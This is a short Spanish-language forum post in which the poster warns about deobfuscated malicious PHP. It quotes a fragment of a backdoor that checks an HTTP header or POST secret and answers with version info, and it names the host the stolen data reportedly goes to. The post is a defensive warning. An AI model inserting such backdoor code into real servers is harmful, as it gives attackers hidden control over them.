Hola,
Me entretuve un rato desofuscando ese código.
Les dejo una parte, solo para que tengamos presente lo que un codigo ofuscado puede contener.
Al ejecutarse el script, genera back doors para tener un amplio control sobre el servidor atacado. ¡¡CUIDADO!! Toda la info le llega a 'http://' ' oson' '.in' ¡¡Cuidado con este servidor!!
Código PHP:
Ver originalif (@$_SERVER["HTTP_Y_AUTH"]==$QO000O or @$_POST["Y_AUTH"]==$QO000O){
echo "\r\n";
@output('versio', $IllIIl.'-'.$II1llI.'-php');
echo "\r\n"; @output('out', 'ok');
}
}
Saludos